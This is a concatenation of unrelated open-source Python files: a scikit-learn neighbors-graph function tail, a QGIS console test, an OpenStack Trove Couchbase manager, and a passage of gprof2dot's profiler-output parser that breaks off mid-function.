A[i, j] is assigned the weight of edge that connects i to j.
Examples
--------
>>> X = [[0], [3], [1]]
>>> from sklearn.neighbors import radius_neighbors_graph
>>> A = radius_neighbors_graph(X, 1.5)
>>> A.toarray()
array([[ 1., 0., 1.],
[ 0., 1., 0.],
[ 1., 0., 1.]])
See also
--------
kneighbors_graph
"""
if not isinstance(X, RadiusNeighborsMixin):
X = NearestNeighbors(radius=radius, metric=metric, p=p,
metric_params=metric_params).fit(X)
else:
_check_params(X, metric, p, metric_params)
query = _query_include_self(X, include_self, mode)
return X.radius_neighbors_graph(query, radius, mode)
|
t-hey/QGIS-Original
|
refs/heads/master
|
tests/src/python/test_console.py
|
22
|
# -*- coding: utf-8 -*-
"""QGIS Unit tests for the console
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
__author__ = 'Matthias Kuhn'
__date__ = '15.4.2016'
__copyright__ = 'Copyright 2015, The QGIS Project'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import qgis # NOQA
import os
from qgis.testing import unittest, start_app
from console import console
from qgis.core import QgsSettings
from qgis.PyQt.QtCore import QCoreApplication
start_app()
class TestConsole(unittest.TestCase):
def setUp(self):
QgsSettings().setValue('pythonConsole/contextHelpOnFirstLaunch', False)
def test_show_console(self):
if os.name == 'nt':
QCoreApplication.setOrganizationName("QGIS")
QCoreApplication.setOrganizationDomain("qgis.org")
QCoreApplication.setApplicationName("QGIS-TEST")
my_console = console.show_console()
my_console_widget = my_console.console
if __name__ == "__main__":
unittest.main()
|
zhangg/trove
|
refs/heads/master
|
trove/guestagent/datastore/experimental/couchbase/manager.py
|
1
|
# Copyright (c) 2013 eBay Software Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
from oslo_log import log as logging
from trove.common.i18n import _
from trove.common import instance as rd_instance
from trove.common.notification import EndNotification
from trove.guestagent import backup
from trove.guestagent.datastore.experimental.couchbase import service
from trove.guestagent.datastore.experimental.couchbase import system
from trove.guestagent.datastore import manager
from trove.guestagent import volume
LOG = logging.getLogger(__name__)
class Manager(manager.Manager):
"""
This is Couchbase Manager class. It is dynamically loaded
based off of the datastore of the trove instance
"""
def __init__(self):
self.appStatus = service.CouchbaseAppStatus()
self.app = service.CouchbaseApp(self.appStatus)
super(Manager, self).__init__('couchbase')
@property
def status(self):
return self.appStatus
def reset_configuration(self, context, configuration):
self.app.reset_configuration(configuration)
def do_prepare(self, context, packages, databases, memory_mb, users,
device_path, mount_point, backup_info,
config_contents, root_password, overrides,
cluster_config, snapshot):
"""This is called from prepare in the base class."""
self.app.install_if_needed(packages)
if device_path:
device = volume.VolumeDevice(device_path)
# unmount if device is already mounted
device.unmount_device(device_path)
device.format()
device.mount(mount_point)
LOG.debug('Mounted the volume (%s).', device_path)
self.app.start_db_with_conf_changes(config_contents)
LOG.debug('Securing couchbase now.')
self.app.initial_setup()
if backup_info:
LOG.debug('Now going to perform restore.')
self._perform_restore(backup_info,
context,
mount_point)
def restart(self, context):
"""
Restart this couchbase instance.
This method is called when the guest agent
gets a restart message from the taskmanager.
"""
self.app.restart()
def start_db_with_conf_changes(self, context, config_contents):
self.app.start_db_with_conf_changes(config_contents)
def stop_db(self, context, do_not_start_on_reboot=False):
"""
Stop this couchbase instance.
This method is called when the guest agent
gets a stop message from the taskmanager.
"""
self.app.stop_db(do_not_start_on_reboot=do_not_start_on_reboot)
def enable_root(self, context):
LOG.debug("Enabling root.")
return self.app.enable_root()
def enable_root_with_password(self, context, root_password=None):
return self.app.enable_root(root_password)
def is_root_enabled(self, context):
LOG.debug("Checking if root is enabled.")
return os.path.exists(system.pwd_file)
def _perform_restore(self, backup_info, context, restore_location):
"""
Restores all couchbase buckets and their documents from the
backup.
"""
LOG.info(_("Restoring database from backup %s"), backup_info['id'])
try:
backup.restore(context, backup_info, restore_location)
except Exception as e:
LOG.error(_("Error performing restore from backup %s"),
backup_info['id'])
LOG.error(e)
self.status.set_status(rd_instance.ServiceStatuses.FAILED)
raise
LOG.info(_("Restored database successfully"))
def create_backup(self, context, backup_info):
"""
Backup all couchbase buckets and their documents.
"""
with EndNotification(context):
backup.backup(context, backup_info)
|
exinnet/kvproxy
|
refs/heads/master
|
test/gprof2dot.py
|
3
|
#!/usr/bin/env python
#
# Copyright 2008-2009 Jose Fonseca
#
# This program is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
"""Generate a dot graph from the output of several profilers."""
__author__ = "Jose Fonseca"
__version__ = "1.0"
import sys
import math
import os.path
import re
import textwrap
import optparse
import xml.parsers.expat
try:
# Debugging helper module
import debug
except ImportError:
pass
def times(x):
return u"%u\xd7" % (x,)
def percentage(p):
return "%.02f%%" % (p*100.0,)
def add(a, b):
return a + b
def equal(a, b):
if a == b:
return a
else:
return None
def fail(a, b):
assert False
tol = 2 ** -23
def ratio(numerator, denominator):
try:
ratio = float(numerator)/float(denominator)
except ZeroDivisionError:
# 0/0 is undefined, but 1.0 yields more useful results
return 1.0
if ratio < 0.0:
if ratio < -tol:
sys.stderr.write('warning: negative ratio (%s/%s)\n' % (numerator, denominator))
return 0.0
if ratio > 1.0:
if ratio > 1.0 + tol:
sys.stderr.write('warning: ratio greater than one (%s/%s)\n' % (numerator, denominator))
return 1.0
return ratio
class UndefinedEvent(Exception):
"""Raised when attempting to get an event which is undefined."""
def __init__(self, event):
Exception.__init__(self)
self.event = event
def __str__(self):
return 'unspecified event %s' % self.event.name
class Event(object):
"""Describe a kind of event, and its basic operations."""
def __init__(self, name, null, aggregator, formatter = str):
self.name = name
self._null = null
self._aggregator = aggregator
self._formatter = formatter
def __eq__(self, other):
return self is other
def __hash__(self):
return id(self)
def null(self):
return self._null
def aggregate(self, val1, val2):
"""Aggregate two event values."""
assert val1 is not None
assert val2 is not None
return self._aggregator(val1, val2)
def format(self, val):
"""Format an event value."""
assert val is not None
return self._formatter(val)
CALLS = Event("Calls", 0, add, times)
SAMPLES = Event("Samples", 0, add)
SAMPLES2 = Event("Samples", 0, add)
TIME = Event("Time", 0.0, add, lambda x: '(' + str(x) + ')')
TIME_RATIO = Event("Time ratio", 0.0, add, lambda x: '(' + percentage(x) + ')')
TOTAL_TIME = Event("Total time", 0.0, fail)
TOTAL_TIME_RATIO = Event("Total time ratio", 0.0, fail, percentage)
class Object(object):
"""Base class for all objects in profile which can store events."""
def __init__(self, events=None):
if events is None:
self.events = {}
else:
self.events = events
def __hash__(self):
return id(self)
def __eq__(self, other):
return self is other
def __contains__(self, event):
return event in self.events
def __getitem__(self, event):
try:
return self.events[event]
except KeyError:
raise UndefinedEvent(event)
def __setitem__(self, event, value):
if value is None:
if event in self.events:
del self.events[event]
else:
self.events[event] = value
class Call(Object):
"""A call between functions.
There should be at most one call object for every pair of functions.
"""
def __init__(self, callee_id):
Object.__init__(self)
self.callee_id = callee_id
self.ratio = None
self.weight = None
class Function(Object):
"""A function."""
def __init__(self, id, name):
Object.__init__(self)
self.id = id
self.name = name
self.module = None
self.process = None
self.calls = {}
self.called = None
self.weight = None
self.cycle = None
def add_call(self, call):
if call.callee_id in self.calls:
sys.stderr.write('warning: overwriting call from function %s to %s\n' % (str(self.id), str(call.callee_id)))
self.calls[call.callee_id] = call
def get_call(self, callee_id):
if not callee_id in self.calls:
call = Call(callee_id)
call[SAMPLES] = 0
call[SAMPLES2] = 0
call[CALLS] = 0
self.calls[callee_id] = call
return self.calls[callee_id]
# TODO: write utility functions
def __repr__(self):
return self.name
class Cycle(Object):
"""A cycle made from recursive function calls."""
def __init__(self):
Object.__init__(self)
# XXX: Do cycles need an id?
self.functions = set()
def add_function(self, function):
assert function not in self.functions
self.functions.add(function)
# XXX: Aggregate events?
if function.cycle is not None:
for other in function.cycle.functions:
if function not in self.functions:
self.add_function(other)
function.cycle = self
class Profile(Object):
"""The whole profile."""
def __init__(self):
Object.__init__(self)
self.functions = {}
self.cycles = []
def add_function(self, function):
if function.id in self.functions:
sys.stderr.write('warning: overwriting function %s (id %s)\n' % (function.name, str(function.id)))
self.functions[function.id] = function
def add_cycle(self, cycle):
self.cycles.append(cycle)
def validate(self):
"""Validate the edges."""
for function in self.functions.itervalues():
for callee_id in function.calls.keys():
assert function.calls[callee_id].callee_id == callee_id
if callee_id not in self.functions:
sys.stderr.write('warning: call to undefined function %s from function %s\n' % (str(callee_id), function.name))
del function.calls[callee_id]
def find_cycles(self):
"""Find cycles using Tarjan's strongly connected components algorithm."""
# Apply the Tarjan's algorithm successively until all functions are visited
visited = set()
for function in self.functions.itervalues():
if function not in visited:
self._tarjan(function, 0, [], {}, {}, visited)
cycles = []
for function in self.functions.itervalues():
if function.cycle is not None and function.cycle not in cycles:
cycles.append(function.cycle)
self.cycles = cycles
if 0:
for cycle in cycles:
sys.stderr.write("Cycle:\n")
for member in cycle.functions:
sys.stderr.write("\tFunction %s\n" % member.name)
def _tarjan(self, function, order, stack, orders, lowlinks, visited):
"""Tarjan's strongly connected components algorithm.
See also:
- http://en.wikipedia.org/wiki/Tarjan's_strongly_connected_components_algorithm
"""
visited.add(function)
orders[function] = order
lowlinks[function] = order
order += 1
pos = len(stack)
stack.append(function)
for call in function.calls.itervalues():
callee = self.functions[call.callee_id]
# TODO: use a set to optimize lookup
if callee not in orders:
order = self._tarjan(callee, order, stack, orders, lowlinks, visited)
lowlinks[function] = min(lowlinks[function], lowlinks[callee])
elif callee in stack:
lowlinks[function] = min(lowlinks[function], orders[callee])
if lowlinks[function] == orders[function]:
# Strongly connected component found
members = stack[pos:]
del stack[pos:]
if len(members) > 1:
cycle = Cycle()
for member in members:
cycle.add_function(member)
return order
def call_ratios(self, event):
# Aggregate for incoming calls
cycle_totals = {}
for cycle in self.cycles:
cycle_totals[cycle] = 0.0
function_totals = {}
for function in self.functions.itervalues():
function_totals[function] = 0.0
for function in self.functions.itervalues():
for call in function.calls.itervalues():
if call.callee_id != function.id:
callee = self.functions[call.callee_id]
function_totals[callee] += call[event]
if callee.cycle is not None and callee.cycle is not function.cycle:
cycle_totals[callee.cycle] += call[event]
# Compute the ratios
for function in self.functions.itervalues():
for call in function.calls.itervalues():
assert call.ratio is None
if call.callee_id != function.id:
callee = self.functions[call.callee_id]
if callee.cycle is not None and callee.cycle is not function.cycle:
total = cycle_totals[callee.cycle]
else:
total = function_totals[callee]
call.ratio = ratio(call[event], total)
def integrate(self, outevent, inevent):
"""Propagate function time ratio allong the function calls.
Must be called after finding the cycles.
See also:
- http://citeseer.ist.psu.edu/graham82gprof.html
"""
# Sanity checking
assert outevent not in self
for function in self.functions.itervalues():
assert outevent not in function
assert inevent in function
for call in function.calls.itervalues():
assert outevent not in call
if call.callee_id != function.id:
assert call.ratio is not None
# Aggregate the input for each cycle
for cycle in self.cycles:
total = inevent.null()
for function in self.functions.itervalues():
total = inevent.aggregate(total, function[inevent])
self[inevent] = total
# Integrate along the edges
total = inevent.null()
for function in self.functions.itervalues():
total = inevent.aggregate(total, function[inevent])
self._integrate_function(function, outevent, inevent)
self[outevent] = total
def _integrate_function(self, function, outevent, inevent):
if function.cycle is not None:
return self._integrate_cycle(function.cycle, outevent, inevent)
else:
if outevent not in function:
total = function[inevent]
for call in function.calls.itervalues():
if call.callee_id != function.id:
total += self._integrate_call(call, outevent, inevent)
function[outevent] = total
return function[outevent]
def _integrate_call(self, call, outevent, inevent):
assert outevent not in call
assert call.ratio is not None
callee = self.functions[call.callee_id]
subtotal = call.ratio *self._integrate_function(callee, outevent, inevent)
call[outevent] = subtotal
return subtotal
def _integrate_cycle(self, cycle, outevent, inevent):
if outevent not in cycle:
# Compute the outevent for the whole cycle
total = inevent.null()
for member in cycle.functions:
subtotal = member[inevent]
for call in member.calls.itervalues():
callee = self.functions[call.callee_id]
if callee.cycle is not cycle:
subtotal += self._integrate_call(call, outevent, inevent)
total += subtotal
cycle[outevent] = total
# Compute the time propagated to callers of this cycle
callees = {}
for function in self.functions.itervalues():
if function.cycle is not cycle:
for call in function.calls.itervalues():
callee = self.functions[call.callee_id]
if callee.cycle is cycle:
try:
callees[callee] += call.ratio
except KeyError:
callees[callee] = call.ratio
for member in cycle.functions:
member[outevent] = outevent.null()
for callee, call_ratio in callees.iteritems():
ranks = {}
call_ratios = {}
partials = {}
self._rank_cycle_function(cycle, callee, 0, ranks)
self._call_ratios_cycle(cycle, callee, ranks, call_ratios, set())
partial = self._integrate_cycle_function(cycle, callee, call_ratio, partials, ranks, call_ratios, outevent, inevent)
assert partial == max(partials.values())
assert not total or abs(1.0 - partial/(call_ratio*total)) <= 0.001
return cycle[outevent]
def _rank_cycle_function(self, cycle, function, rank, ranks):
if function not in ranks or ranks[function] > rank:
ranks[function] = rank
for call in function.calls.itervalues():
if call.callee_id != function.id:
callee = self.functions[call.callee_id]
if callee.cycle is cycle:
self._rank_cycle_function(cycle, callee, rank + 1, ranks)
def _call_ratios_cycle(self, cycle, function, ranks, call_ratios, visited):
if function not in visited:
visited.add(function)
for call in function.calls.itervalues():
if call.callee_id != function.id:
callee = self.functions[call.callee_id]
if callee.cycle is cycle:
if ranks[callee] > ranks[function]:
call_ratios[callee] = call_ratios.get(callee, 0.0) + call.ratio
self._call_ratios_cycle(cycle, callee, ranks, call_ratios, visited)
def _integrate_cycle_function(self, cycle, function, partial_ratio, partials, ranks, call_ratios, outevent, inevent):
if function not in partials:
partial = partial_ratio*function[inevent]
for call in function.calls.itervalues():
if call.callee_id != function.id:
callee = self.functions[call.callee_id]
if callee.cycle is not cycle:
assert outevent in call
partial += partial_ratio*call[outevent]
else:
if ranks[callee] > ranks[function]:
callee_partial = self._integrate_cycle_function(cycle, callee, partial_ratio, partials, ranks, call_ratios, outevent, inevent)
call_ratio = ratio(call.ratio, call_ratios[callee])
call_partial = call_ratio*callee_partial
try:
call[outevent] += call_partial
except UndefinedEvent:
call[outevent] = call_partial
partial += call_partial
partials[function] = partial
try:
function[outevent] += partial
except UndefinedEvent:
function[outevent] = partial
return partials[function]
def aggregate(self, event):
"""Aggregate an event for the whole profile."""
total = event.null()
for function in self.functions.itervalues():
try:
total = event.aggregate(total, function[event])
except UndefinedEvent:
return
self[event] = total
def ratio(self, outevent, inevent):
assert outevent not in self
assert inevent in self
for function in self.functions.itervalues():
assert outevent not in function
assert inevent in function
function[outevent] = ratio(function[inevent], self[inevent])
for call in function.calls.itervalues():
assert outevent not in call
if inevent in call:
call[outevent] = ratio(call[inevent], self[inevent])
self[outevent] = 1.0
def prune(self, node_thres, edge_thres):
"""Prune the profile"""
# compute the prune ratios
for function in self.functions.itervalues():
try:
function.weight = function[TOTAL_TIME_RATIO]
except UndefinedEvent:
pass
for call in function.calls.itervalues():
callee = self.functions[call.callee_id]
if TOTAL_TIME_RATIO in call:
# handle exact cases first
call.weight = call[TOTAL_TIME_RATIO]
else:
try:
# make a safe estimate
call.weight = min(function[TOTAL_TIME_RATIO], callee[TOTAL_TIME_RATIO])
except UndefinedEvent:
pass
# prune the nodes
for function_id in self.functions.keys():
function = self.functions[function_id]
if function.weight is not None:
if function.weight < node_thres:
del self.functions[function_id]
# prune the egdes
for function in self.functions.itervalues():
for callee_id in function.calls.keys():
call = function.calls[callee_id]
if callee_id not in self.functions or call.weight is not None and call.weight < edge_thres:
del function.calls[callee_id]
def dump(self):
for function in self.functions.itervalues():
sys.stderr.write('Function %s:\n' % (function.name,))
self._dump_events(function.events)
for call in function.calls.itervalues():
callee = self.functions[call.callee_id]
sys.stderr.write(' Call %s:\n' % (callee.name,))
self._dump_events(call.events)
for cycle in self.cycles:
sys.stderr.write('Cycle:\n')
self._dump_events(cycle.events)
for function in cycle.functions:
sys.stderr.write(' Function %s\n' % (function.name,))
def _dump_events(self, events):
for event, value in events.iteritems():
sys.stderr.write(' %s: %s\n' % (event.name, event.format(value)))
class Struct:
"""Masquerade a dictionary with a structure-like behavior."""
def __init__(self, attrs = None):
if attrs is None:
attrs = {}
self.__dict__['_attrs'] = attrs
def __getattr__(self, name):
try:
return self._attrs[name]
except KeyError:
raise AttributeError(name)
def __setattr__(self, name, value):
self._attrs[name] = value
def __str__(self):
return str(self._attrs)
def __repr__(self):
return repr(self._attrs)
class ParseError(Exception):
"""Raised when parsing to signal mismatches."""
def __init__(self, msg, line):
self.msg = msg
# TODO: store more source line information
self.line = line
def __str__(self):
return '%s: %r' % (self.msg, self.line)
class Parser:
"""Parser interface."""
def __init__(self):
pass
def parse(self):
raise NotImplementedError
class LineParser(Parser):
"""Base class for parsers that read line-based formats."""
def __init__(self, file):
Parser.__init__(self)
self._file = file
self.__line = None
self.__eof = False
self.line_no = 0
def readline(self):
line = self._file.readline()
if not line:
self.__line = ''
self.__eof = True
else:
self.line_no += 1
self.__line = line.rstrip('\r\n')
def lookahead(self):
assert self.__line is not None
return self.__line
def consume(self):
assert self.__line is not None
line = self.__line
self.readline()
return line
def eof(self):
assert self.__line is not None
return self.__eof
XML_ELEMENT_START, XML_ELEMENT_END, XML_CHARACTER_DATA, XML_EOF = range(4)
class XmlToken:
def __init__(self, type, name_or_data, attrs = None, line = None, column = None):
assert type in (XML_ELEMENT_START, XML_ELEMENT_END, XML_CHARACTER_DATA, XML_EOF)
self.type = type
self.name_or_data = name_or_data
self.attrs = attrs
self.line = line
self.column = column
def __str__(self):
if self.type == XML_ELEMENT_START:
return '<' + self.name_or_data + ' ...>'
if self.type == XML_ELEMENT_END:
return '</' + self.name_or_data + '>'
if self.type == XML_CHARACTER_DATA:
return self.name_or_data
if self.type == XML_EOF:
return 'end of file'
assert 0
class XmlTokenizer:
"""Expat based XML tokenizer."""
def __init__(self, fp, skip_ws = True):
self.fp = fp
self.tokens = []
self.index = 0
self.final = False
self.skip_ws = skip_ws
self.character_pos = 0, 0
self.character_data = ''
self.parser = xml.parsers.expat.ParserCreate()
self.parser.StartElementHandler = self.handle_element_start
self.parser.EndElementHandler = self.handle_element_end
self.parser.CharacterDataHandler = self.handle_character_data
def handle_element_start(self, name, attributes):
self.finish_character_data()
line, column = self.pos()
token = XmlToken(XML_ELEMENT_START, name, attributes, line, column)
self.tokens.append(token)
def handle_element_end(self, name):
self.finish_character_data()
line, column = self.pos()
token = XmlToken(XML_ELEMENT_END, name, None, line, column)
self.tokens.append(token)
def handle_character_data(self, data):
if not self.character_data:
self.character_pos = self.pos()
self.character_data += data
def finish_character_data(self):
if self.character_data:
if not self.skip_ws or not self.character_data.isspace():
line, column = self.character_pos
token = XmlToken(XML_CHARACTER_DATA, self.character_data, None, line, column)
self.tokens.append(token)
self.character_data = ''
def next(self):
size = 16*1024
while self.index >= len(self.tokens) and not self.final:
self.tokens = []
self.index = 0
data = self.fp.read(size)
self.final = len(data) < size
try:
self.parser.Parse(data, self.final)
except xml.parsers.expat.ExpatError, e:
#if e.code == xml.parsers.expat.errors.XML_ERROR_NO_ELEMENTS:
if e.code == 3:
pass
else:
raise e
if self.index >= len(self.tokens):
line, column = self.pos()
token = XmlToken(XML_EOF, None, None, line, column)
else:
token = self.tokens[self.index]
self.index += 1
return token
def pos(self):
return self.parser.CurrentLineNumber, self.parser.CurrentColumnNumber
class XmlTokenMismatch(Exception):
def __init__(self, expected, found):
self.expected = expected
self.found = found
def __str__(self):
return '%u:%u: %s expected, %s found' % (self.found.line, self.found.column, str(self.expected), str(self.found))
class XmlParser(Parser):
"""Base XML document parser."""
def __init__(self, fp):
Parser.__init__(self)
self.tokenizer = XmlTokenizer(fp)
self.consume()
def consume(self):
self.token = self.tokenizer.next()
def match_element_start(self, name):
return self.token.type == XML_ELEMENT_START and self.token.name_or_data == name
def match_element_end(self, name):
return self.token.type == XML_ELEMENT_END and self.token.name_or_data == name
def element_start(self, name):
while self.token.type == XML_CHARACTER_DATA:
self.consume()
if self.token.type != XML_ELEMENT_START:
raise XmlTokenMismatch(XmlToken(XML_ELEMENT_START, name), self.token)
if self.token.name_or_data != name:
raise XmlTokenMismatch(XmlToken(XML_ELEMENT_START, name), self.token)
attrs = self.token.attrs
self.consume()
return attrs
def element_end(self, name):
while self.token.type == XML_CHARACTER_DATA:
self.consume()
if self.token.type != XML_ELEMENT_END:
raise XmlTokenMismatch(XmlToken(XML_ELEMENT_END, name), self.token)
if self.token.name_or_data != name:
raise XmlTokenMismatch(XmlToken(XML_ELEMENT_END, name), self.token)
self.consume()
def character_data(self, strip = True):
data = ''
while self.token.type == XML_CHARACTER_DATA:
data += self.token.name_or_data
self.consume()
if strip:
data = data.strip()
return data
class GprofParser(Parser):
"""Parser for GNU gprof output.
See also:
- Chapter "Interpreting gprof's Output" from the GNU gprof manual
http://sourceware.org/binutils/docs-2.18/gprof/Call-Graph.html#Call-Graph
- File "cg_print.c" from the GNU gprof source code
http://sourceware.org/cgi-bin/cvsweb.cgi/~checkout~/src/gprof/cg_print.c?rev=1.12&cvsroot=src
"""
def __init__(self, fp):
Parser.__init__(self)
self.fp = fp
self.functions = {}
self.cycles = {}
def readline(self):
line = self.fp.readline()
if not line:
sys.stderr.write('error: unexpected end of file\n')
sys.exit(1)
line = line.rstrip('\r\n')
return line
_int_re = re.compile(r'^\d+$')
_float_re = re.compile(r'^\d+\.\d+$')
def translate(self, mo):
"""Extract a structure from a match object, while translating the types in the process."""
attrs = {}
groupdict = mo.groupdict()
for name, value in groupdict.iteritems():
if value is None:
value = None
elif self._int_re.match(value):
value = int(value)
elif self._float_re.match(value):
value = float(value)
attrs[name] = (value)
return Struct(attrs)
_cg_header_re = re.compile(
# original gprof header
r'^\s+called/total\s+parents\s*$|' +
r'^index\s+%time\s+self\s+descendents\s+called\+self\s+name\s+index\s*$|' +
r'^\s+called/total\s+children\s*$|' +
# GNU gprof header
r'^index\s+%\s+time\s+self\s+children\s+called\s+name\s*$'
)
_cg_ignore_re = re.compile(
# spontaneous
r'^\s+<spontaneous>\s*$|'
# internal calls (such as "mcount")
r'^.*\((\d+)\)$'
)
_cg_primary_re = re.compile(
r'^\[(?P<index>\d+)\]?' +
r'\s+(?P<percentage_time>\d+\.\d+)' +
r'\s+(?P<self>\d+\.\d+)' +
r'\s+(?P<descendants>\d+\.\d+)' +
r'\s+(?:(?P<called>\d+)(?:\+(?P<called_self>\d+))?)?' +
r'\s+(?P<name>\S.*?)' +
r'(?:\s+<cycle\s(?P<cycle>\d+)>)?' +
r'\s\[(\d+)\]$'
)
_cg_parent_re = re.compile(
r'^\s+(?P<self>\d+\.\d+)?' +
r'\s+(?P<descendants>\d+\.\d+)?' +
r'\s+(?P<called>\d+)(?:/(?P<called_total>\d+))?' +
r'\s+(?P<name>\S.*?)' +
r'(?:\s+<cycle\s(?P<cycle>\d+)>)?' +
r'\s\[(?P<index>\d+)\]$'
)
_cg_child_re = _cg_parent_re
_cg_cycle_header_re = re.compile(
r'^\[(?P<index>\d+)\]?' +
r'\s+(?P<percentage_time>\d+\.\d+)' +
r'\s+(?P<self>\d+\.\d+)' +
r'\s+(?P<descendants>\d+\.\d+)' +
r'\s+(?:(?P<called>\d+)(?:\+(?P<called_self>\d+))?)?' +
r'\s+<cycle\s(?P<cycle>\d+)\sas\sa\swhole>' +
r'\s\[(\d+)\]$'
)
_cg_cycle_member_re = re.compile(
r'^\s+(?P<self>\d+\.\d+)?' +
r'\s+(?P<descendants>\d+\.\d+)?' +
r'\s+(?P<called>\d+)(?:\+(?P<called_self>\d+))?' +
r'\s+(?P<name>\S.*?)' +
r'(?:\s+<cycle\s(?P<cycle>\d+)>)?' +
r'\s\[(?P<index>\d+)\]$'
)
_cg_sep_re = re.compile(r'^--+$')
def parse_function_entry(self, lines):
parents = []
children = []
while True:
if not lines:
sys.stderr.write('warning: unexpected end of entry\n')
line = lines.pop(0)
if line.startswith('['):
break
# read function parent line
mo = self._cg_parent_re.match(line)
if not mo:
if self._cg_ignore_re.match(line):
continue
sys.stderr.write('warning: unrecognized call graph entry: %r\n' % line)
else:
parent = self.translate(mo)
parents.append(parent)
# read primary line
mo = self._cg_primary_re.match(line)
if not mo:
sys.stderr.write('warning: unrecognized call graph entry: %r\n' % line)
return
else:
function = self.translate(mo)
while lines:
line = lines.pop(0)
# read function subroutine line
mo = self._cg_child_re.match(line)
if not mo:
if self._cg_ignore_re.match(line):
continue
sys.stderr.write('warning: unrecognized call graph entry: %r\n' % line)
else:
child = self.translate(mo)
children.append(child)
function.parents = parents
function.children = children
self.functions[function.index] = function
def parse_cycle_entry(self, lines):
# read cycle header line
line = lines[0]
mo = self._cg_cycle_header_re.match(line)
if not mo:
sys.stderr.write('warning: unrecognized call graph entry: %r\n' % line)
return
cycle = self.translate(mo)
# read cycle member lines
cycle.functions = []
for line in lines[1:]:
mo = self._cg_cycle_member_re.match(line)
if not mo:
sys.stderr.write('warning: unrecognized call graph entry: %r\n' % line)
continue
call = self.translate(mo)
cycle.functions.append(call)
self.cycles[cycle.cycle] = cycle
def parse_cg_entry(self, lines):
if lines[0].startswith("["):
self.parse_cycle_entry(lines)
else:
self.parse_function_entry(lines)
def parse_cg(self):
"""Parse the call graph."""
# skip call graph header
while not self._cg_header_re.match(self.readline()):
pass
line = self.readline()
while self._cg_header_re.match(line):
line = self.readline()
# process call graph entries
entry_lines = []
while line != '\014': # form feed
if line and not line.isspace():
if self._cg_sep_re.match(line):
self.parse_cg_entry(entry_lines)
entry_lines = []
else:
entry_lines.append(line)
line = self.readline()
def parse(self):
self.parse_cg()
self.fp.close()
profile = Profile()
profile[TIME] = 0.0
cycles = {}
for index in self.cycles.iterkeys():
cycles[index] = Cycle()
for entry in self.functions.itervalues():
# populate the function
function = Function(entry.index, entry.name)
function[TIME] = entry.self
if entry.called is not None:
function.called = entry.called
if entry.called_self is not None:
call = Call(entry.index)
call[CALLS] = entry.called_self
function.called += entry.called_self
# populate the function calls
for child in entry.children:
call = Call(child.index)
assert child.called is not None
call[CALLS] = child.called
if child.index not in self.functions:
# NOTE: functions that were never called but were discovered by gprof's
# static call graph analysis dont have a call graph entry so we need
# to add them here
missing = Function(child.index, child.name)
function[TIME] = 0.0
function.called = 0
profile.add_function(missing)
function.add_call(call)
profile.add_function(function)
if entry.cycle is not None:
try:
cycle = cycles[entry.cycle]
except KeyError:
sys.stderr.write('warning: <cycle %u as a whole> entry missing\n' % entry.cycle)
cycle = Cycle()
cycles[entry.cycle] = cycle
cycle.add_function(function)
profile[TIME] = profile[TIME] + function[TIME]
for cycle in cycles.itervalues():
profile.add_cycle(cycle)
# Compute derived events
profile.validate()
profile.ratio(TIME_RATIO, TIME)
profile.call_ratios(CALLS)
profile.integrate(TOTAL_TIME, TIME)
profile.ratio(TOTAL_TIME_RATIO, TOTAL_TIME)
return profile
class CallgrindParser(LineParser):
"""Parser for valgrind's callgrind tool.
See also:
- http://valgrind.org/docs/manual/cl-format.html
"""
_call_re = re.compile('^calls=\s*(\d+)\s+((\d+|\+\d+|-\d+|\*)\s+)+$')
def __init__(self, infile):
LineParser.__init__(self, infile)
# Textual positions
self.position_ids = {}
self.positions = {}
# Numeric positions
self.num_positions = 1
self.cost_positions = ['line']
self.last_positions = [0]
# Events
self.num_events = 0
self.cost_events = []
self.profile = Profile()
self.profile[SAMPLES] = 0
def parse(self):
# read lookahead
self.readline()
self.parse_key('version')
self.parse_key('creator')
self.parse_part()
# compute derived data
self.profile.validate()
self.profile.find_cycles()
self.profile.ratio(TIME_RATIO, SAMPLES)
self.profile.call_ratios(CALLS)
self.profile.integrate(TOTAL_TIME_RATIO, TIME_RATIO)
return self.profile
def parse_part(self):
while self.parse_header_line():
pass
while self.parse_body_line():
pass
if not self.eof() and False:
sys.stderr.write('warning: line %u: unexpected line\n' % self.line_no)
sys.stderr.write('%s\n' % self.lookahead())
return True
def parse_header_line(self):
return \
self.parse_empty() or \
self.parse_comment() or \
self.parse_part_detail() or \
self.parse_description() or \
self.parse_event_specification() or \
self.parse_cost_line_def() or \
self.parse_cost_summary()
_detail_keys = set(('cmd', 'pid', 'thread', 'part'))
def parse_part_detail(self):
return self.parse_keys(self._detail_keys)
def parse_description(self):
return self.parse_key('desc') is not None
def parse_event_specification(self):
event = self.parse_key('event')
if event is None:
return False
return True
def parse_cost_line_def(self):
pair = self.parse_keys(('events', 'positions'))
if pair is None:
return False
key, value = pair
items = value.split()
if key == 'events':
self.num_events = len(items)
self.cost_events = items
if key == 'positions':
self.num_positions = len(items)
self.cost_positions = items
self.last_positions = [0]*self.num_positions
return True
def parse_cost_summary(self):
pair = self.parse_keys(('summary', 'totals'))
if pair is None:
return False
return True
def parse_body_line(self):
return \
self.parse_empty() or \
self.parse_comment() or \
self.parse_cost_line() or \
self.parse_position_spec() or \
self.parse_association_spec()
__subpos_re = r'(0x[0-9a-fA-F]+|\d+|\+\d+|-\d+|\*)'
_cost_re = re.compile(r'^' +
__subpos_re + r'( +' + __subpos_re + r')*' +
r'( +\d+)*' +
'$')
def parse_cost_line(self, calls=None):
line = self.lookahead().rstrip()
mo = self._cost_re.match(line)
if not mo:
return False
function = self.get_function()
values = line.split()
assert len(values) <= self.num_positions + self.num_events
positions = values[0 : self.num_positions]
